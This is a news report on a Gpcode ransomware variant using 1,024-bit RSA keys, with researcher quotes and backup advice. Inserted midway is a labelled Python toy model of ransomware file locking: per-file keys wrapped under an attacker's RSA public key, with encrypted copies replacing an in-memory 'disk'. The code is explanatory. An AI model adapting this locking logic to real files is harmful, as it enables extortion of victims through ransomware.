Researchers at Kaspersky Lab have identified a new and improved variant
of the blackmailing Gpcode trojan, which encrypts files on a victim's
computer and then demands payment in exchange for the keys.
"He [the author] makes an encrypted copy of the files and deletes the
original files," Roel Schouwenberg, a senior anti-virus researcher at
Kaspersky, told SCMagazineUS.com on Friday. "All that's left on the
user's machine is an encrypted version of the files."
Experts first spotted this malware about three years ago, when the
author used a 660-bit RSA key to hold victims' files -- including MP3s,
photos, documents -- hostage until the user paid up, Schouwenberg said.
At the time, the Kaspersky team was able to crack the encryption and
offer the key to its users; this time, the malware author is using a
1,024-bit RSA key, he said. It is unclear how widespread the infection
is.
"The major difference between back then and now is that the author has
seemed to learn from his mistakes," he said. "It's almost impossible to
crack this key. We have been unable to track down any implementation
errors."
In addition, the author is circulating a number of different variants of
Gpcode, each using its own RSA public/private key pair, Schouwenberg
said. Recovering the private key for one variant would therefore not
unlock files encrypted by the others, which rules out brute force as a
practical way to crack the keys.
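The two points above -- that the victim's machine ends up holding only an encrypted copy of each file plus the attacker's public key, and that each variant's key pair is independent -- can be seen in a small model. The following is an added example, not Gpcode's code and not taken from Kaspersky's analysis; it assumes textbook RSA without padding, a SHA-256 keystream as the per-file cipher, an in-memory dict standing in for the disk and a made-up ".locked" suffix. Only the 1,024-bit RSA key size comes from the article.

```python
"""Toy model of a public-key file-locking trojan (added example, not Gpcode).

Assumptions not stated in the article: textbook (unpadded) RSA, a SHA-256
keystream as the per-file cipher, a dict in place of the filesystem, and the
".locked" suffix. Only the 1,024-bit RSA modulus size comes from the article.
"""
import hashlib
import random
import secrets

# Odd primes below 1000, used for cheap trial division before Miller-Rabin.
_SMALL_PRIMES = [p for p in range(3, 1000, 2)
                 if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


def _is_probable_prime(n, rounds=32):
    """Trial division by small primes, then Miller-Rabin with random bases."""
    if n < 2:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
    for p in _SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False          # a is a witness: n is composite
    return True


def _random_prime(bits):
    """Random prime of exactly `bits` bits (top bit set, odd)."""
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def generate_keypair(bits=1024):
    """Return ((n, e), (n, d)). One such pair per malware variant."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:                 # e must be invertible mod phi
            return (p * q, e), (p * q, pow(e, -1, phi))


def _stream_xor(key, data):
    """Toy stream cipher: XOR with SHA-256(key || block counter). Illustration only."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        out += bytes(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)


def infect(disk, public_key):
    """Replace every file with an encrypted copy and drop the original.

    Each file gets a fresh 32-byte key; that key is RSA-encrypted under the
    attacker's public key, so the machine keeps (n, e) and ciphertext, never d.
    """
    n, e = public_key
    locked = {}
    for name, content in disk.items():
        file_key = secrets.token_bytes(32)
        wrapped = pow(int.from_bytes(file_key, "big"), e, n)   # 256-bit m < n
        locked[name + ".locked"] = (wrapped, _stream_xor(file_key, content))
    return locked


def recover(locked, private_key):
    """What the key holder can do: unwrap each file key with d, then decrypt.

    With the wrong variant's private key the unwrapped value is a random
    residue mod the wrong n, almost never a 32-byte key, so the file stays lost.
    """
    n, d = private_key
    disk = {}
    for name, (wrapped, ciphertext) in locked.items():
        original = name[:-len(".locked")]
        m = pow(wrapped, d, n)
        if m.bit_length() > 256:               # not a 32-byte key: wrong d
            disk[original] = None
            continue
        disk[original] = _stream_xor(m.to_bytes(32, "big"), ciphertext)
    return disk


if __name__ == "__main__":
    # Constructed sample "disk"; variant A and variant B have independent keys.
    files = {"photo.jpg": b"\xff\xd8 sample image bytes", "notes.doc": b"Q2 numbers " * 4}
    pub_a, priv_a = generate_keypair(1024)
    pub_b, priv_b = generate_keypair(1024)
    locked = infect(files, pub_a)
    print("left on disk:", sorted(locked))
    print("variant A key restores files:", recover(locked, priv_a) == files)
    print("variant B key restores files:", recover(locked, priv_b) == files)
```

The model shows why the backup advice is the only general remedy: nothing stored on the machine (public key, wrapped file keys, ciphertext) yields the private exponent, and the only key-independent route back is factoring the 1,024-bit modulus. Note that unpadded RSA and a hash-based keystream are used purely to keep the example dependency-free; they are not a recommended design.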
Researchers are unsure exactly how attackers seed the victim's machine
with the trojan -- social engineering is the likeliest technique -- but
users are encouraged to keep their anti-virus signatures up to date.
Schouwenberg warned, though, that if the attacker uses a
yet-to-be-detected variant of the malware, only making regular backups
will prevent the files from being harmed.
"The reason we are making such a big fuss about this is because if you
don't have any recent backups, you basically can consider your files
lost," he said.
That is, unless you agree to pay for the private key -- around $100 --
although that is no guarantee the files will be safe, Schouwenberg said.